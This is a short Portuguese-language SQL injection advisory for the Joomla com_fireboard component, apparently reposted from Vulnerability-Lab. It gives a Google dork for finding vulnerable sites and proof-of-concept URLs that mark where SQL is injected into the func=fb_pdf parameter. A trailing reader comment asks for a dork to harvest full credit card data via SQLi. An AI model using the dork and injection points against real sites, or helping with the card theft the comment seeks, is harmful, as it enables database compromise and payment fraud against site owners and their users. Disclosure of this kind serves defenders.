A vulnerabilidade de injeção SQL é detectado no módulo com_fireboard do Sistema de Gerenciamento de Conteúdo Joomla.
Atacantes remotos e de baixa contas de usuários privilegiados podem executar / injetar próprios comandos SQL para comprometer a aplicação SGBD.
A vulnerabilidade está localizado no módulo com_fireboard
Módulo vulnerável (s):
[+] index.php?option=com_fireboard
Parâmetro Vulnerável (s):
[+] func fb_
Prova de Conceito:
=================
A vulnerabilidade de injeção SQL pode ser explorada por atacantes remotos sem ação do usuário entre e com baixo
conta de usuário privilegiado.
Dork:inurl:"id=" & intext:"/com_fireboard/"
SITE.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
SITE.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
SITE.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
SITE.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
SITE.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
tem alguma dork para pegar ccfull ??? SQLI
ResponderExcluir